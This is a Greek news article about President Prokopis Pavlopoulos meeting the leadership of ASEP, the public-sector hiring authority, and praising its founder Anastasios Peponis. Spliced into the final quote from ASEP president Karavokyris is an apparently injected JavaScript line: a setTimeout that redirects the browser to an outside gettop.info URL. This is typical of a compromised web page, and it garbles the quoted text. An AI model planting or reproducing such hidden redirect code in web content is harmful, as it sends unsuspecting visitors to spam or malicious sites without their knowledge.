Παυλόπουλος: Οι πολιτικοί να κάνουν το καθήκον τους δίχως να υπολογίζουν το κόστος

0
2

 

Στο Προεδρικό Μέγαρο βρέθηκαν σήμερα ο πρόεδρος του Ανωτάτου Συμβουλίου Επιλογής Προσωπικού (ΑΣΕΠ), Ιωάννης Καραβοκύρης και οι τρεις αντιπρόεδροι Διονύσιος Λασκαράτος, Ηλίας Νικολακόπουλος και Αθανάσιος Παπαϊωάννους προκειμένου να συναντήσουν τον Πρόεδρο της Δημοκρατίας, Προκόπη Παυλόπουλο.

O κ. Παυλόπουλος υπογράμμισε τη σημασία του ΑΣΕΠ ως ανεξάρτητης αρχής και αναφέρθηκε στον αείμνηστο Αναστάσιο Πεπονή, ο οποίος ως υπουργός Προεδρίας θέσπισε το ΑΣΕΠ με τον Ν.2190/94.

«Θέλω να θυμηθούμε ότι ήταν δικιά του ιδέα, την οποία υποστήριξε με τεράστιο πολιτικό κόστος, που όλοι το γνωρίζουν. Σημασία έχει, όμως, ότι το έργο αυτό έμεινε και ότι όλοι αναγνωρίζουμε την προσφορά αυτού του πολιτικού ευπατρίδη, του οποίου το παράδειγμα μας δείχνει και κάτι άλλο», επεσήμανε ο κ. Παυλόπουλος.

Όπως συμπλήρωσε: «Οι πολιτικοί, εκείνοι που θέλουν να μείνουν πραγματικά στην ιστορία, πρέπει να κάνουν το καθήκον τους δίχως να υπολογίζουν τη συγκυρία και το πολιτικό κόστος. Ας είναι, λοιπόν, το παράδειγμα του Αναστάση Πεπονή ένας οδηγός και για τα δικά σας καθήκοντα, αλλά και γενικότερα για τον τρόπο που πρέπει όλοι να αντιμετωπίζουμε το δημόσιο συμφέρον αυτές τις κρίσιμες ώρες για τον τόπο».

Ο κ. Καραβοκύρης ευχαρίστησε θερμά τον Πρόεδρο της Δημοκρατίας για τη συνάντηση και υπογράμμισε: «Η κοινωνία πραγματικά περιμένει πάρα πολλά από μας, γιατί πράγματι το ΑΣΕΠ έχει διανύσει περίπου 22 χρόνια λειτουργίας». «Έχει δώσει- πιστεύω- καλά δείγματα και βέβαια σε μας δημιουργείται μία υποχρέωση, μία παρακαταθήκη, να τηρήσουμε αυτήν τη φερεγγυότητα που έχει επιδείξει προς τον πολίτη και βέβαια να την εμβαθύνουμε ακόμα περισσότερο». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here